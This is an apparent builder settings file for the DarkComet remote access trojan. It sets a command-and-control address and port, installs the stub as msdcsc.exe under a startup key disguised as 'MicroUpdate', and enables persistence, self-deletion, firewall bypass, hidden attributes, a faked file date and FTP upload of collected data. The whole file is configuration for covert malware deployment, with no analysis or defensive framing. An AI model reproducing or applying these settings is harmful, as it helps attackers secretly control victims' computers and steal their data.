[EDITSERVER]
NAME=Settings-01
WRITETYPE=RES
PASSWORD=YES
PWD=0123456789
MUTEX=DC_MUTEX-LLZYMMM
SID=Guest16
IPTEXT=192.168.1.2
PORTTEXT=1604
TREEIP=192.168.1.2:1604
INSTALL=YES
PERSINST=YES
COMBOPATH=10
EDTPATH=MSDCSC\msdcsc.exe
EDTKEYNAME=MicroUpdate
MELT=YES
DATE=YES
FWB=YES
PERS=YES
EDTDATE=16/04/2007
ATTRIB1=YES
ATTRIB2=YES
ATTRIB6=YES
ATTRIB7=YES
COMBOFAKE=4
EDTMSGTITLE=Welcome
EDTMSG=Welcome to DarkComet RAT.
If you see this message, it means the stub successfully runs and you will apear 
in the master user list.

SH1=YES
SH3=YES
SH4=YES
SH5=YES
SH6=YES
SH7=YES
SH8=YES
SH9=YES
SH10=YES
CHIDEF=YES
CHIDED=YES
CHECKOFF=YES
EDTFTPHOST=ftp.yourhost.com
EDTFTPUSER=username
EDTFTPPASS=0123456789
EDTFTPPORT=21
EDTFTPROOT=/
SPSIZE=10
EDTPOISONIP=127.0.0.1
EDTPOISONDNS=localhost
RAD1=YES
COMBOEXT=0
CHECKPROFILESAVE=YES
PACK=NOPACK
